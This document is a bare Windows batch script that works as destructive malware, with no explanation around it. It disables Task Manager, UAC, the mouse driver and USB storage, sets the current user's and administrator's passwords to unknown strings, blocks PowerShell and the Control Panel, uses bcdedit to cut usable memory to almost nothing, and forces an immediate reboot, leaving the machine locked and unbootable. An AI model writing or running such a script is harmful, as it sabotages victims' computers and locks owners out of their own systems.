@echo off
 
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul

RUNDLL32 USER32.DLL,SwapMouseButton

%SystemRoot%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

%SystemRoot%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f

%SystemRoot%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f > nul

-set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete "%key%" /f
reg add "%key%" /v "Start" /t REG_DWORD /d 4 /f
reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v "CursorBase" /t REG_SZ /d 1 /f    
                                      

net user %username% FerkdFDTGK532sd6sq2df6sdf3dfjhdfdfsf54sdf5sd6f4

net user %username% Rccxx°+)}])¨m*ù$/*/*</PASSWORD

net user administrator GoofyCatX✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀S𒄆✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒀱✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒉹࿐ੁ⁂җ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀۝°Ⓦ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀✿

net user %username% K✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀A✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀S𒄆✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒀱✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒉹࿐ੁ⁂җ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀۝°Ⓦ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀✿*✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀ﾟ‘
*************************************************

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR" /v "Start" /t REG_DWORD /d 4 /f > nul

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies" /v "WriteProtect" /t REG_DWORD /d 1 /f > nul

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f > nul

REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f > nul

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 0 /f > nul

REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "SearchboxTaskbarMode" /t REG_DWORD /d 0 /f > nul

REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "SearchboxTaskbarModeOverride" /t REG_DWORD /d 1 /f > nul

for /f "skip=1" %%p in ('wmic os get TotalVisibleMemorySize') do ( 
   set system_ram=%%p
   goto :end
)
:end

set /a "c=%system_ram% - 28"
bcdedit.exe /set removememory %c% 


reg add "HKLM\Software\Microsoft\PowerShell\1\ShellIds\ScriptedDiagnostics" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f > nul

reg add "HKLM\Software\WOW6432Node\Microsoft\PowerShell\1\ShellIds\ScriptedDiagnostics" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f > nul

reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d "0" /f > nul

reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Environment" /v "__PSLockDownPolicy" /t REG_SZ /d "4" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "powershell_ise.exe" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "powershellcustomhost.exe" /f > nul


shutdown -r -f -t 00

